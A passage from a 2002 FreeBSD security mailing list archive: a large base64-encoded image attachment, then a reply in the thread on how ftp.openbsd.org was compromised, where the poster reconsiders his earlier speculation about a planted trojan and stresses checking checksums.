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 ------=_NextPart_000_0001_01C23A2E.0244DFD0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 12:52:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6C80E37B400 for ; Fri, 2 Aug 2002 12:52:53 -0700 (PDT) Received: from localhost.neotext.ca (h24-70-64-200.ed.shawcable.net [24.70.64.200]) by mx1.FreeBSD.org (Postfix) with ESMTP id A7A1343E6A for ; Fri, 2 Aug 2002 12:52:41 -0700 (PDT) (envelope-from campbell@babayaga.neotext.ca) Received: from babayaga.neotext.ca (localhost.neotext.ca [127.0.0.1]) by localhost.neotext.ca (8.11.6/8.11.0) with ESMTP id g72JrAi02943; Fri, 2 Aug 2002 13:53:10 -0600 (MDT) (envelope-from campbell@babayaga.neotext.ca) From: "Duncan Patton a Campbell is Dhu" To: "Duncan Patton a Campbell is Dhu" , Holt Grendal , security@FreeBSD.ORG Subject: Re: How was ftp.openbsd.org compromised? Date: Fri, 2 Aug 2002 13:53:10 -0600 Message-Id: <20020802195310.M1510@babayaga.neotext.ca> In-Reply-To: <20020801180025.M96766@babayaga.neotext.ca> References: <20020801154603.31872.qmail@web11601.mail.yahoo.com> <20020801180025.M96766@babayaga.neotext.ca> X-Mailer: Open WebMail 1.70 20020712 X-OriginatingIP: 127.0.0.1 (campbell) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I should think before letting paranoia set in. There's an AI Hacker's convention on in Edmonton... Only those who compulsively upgrade their security and don't check the checksums could get this. Duncan Patton a Campbell is Duibh ;-) ---------- Original Message ----------- From: "Duncan Patton a Campbell is Dhu" To: Holt Grendal , security@FreeBSD.ORG Sent: Thu, 1 Aug 2002 12:00:25 -0600 Subject: Re: How was ftp.openbsd.org compromised? > Ah yes, the Politics of Security rears its head. > > >From the looks of it, this "trojan" was meant to be found: far > to clumsy > and obvious to be otherwise. > > Why? One can only speculate, but I'd hazard a guess that > someone > with access to the U of A's sunsite has a 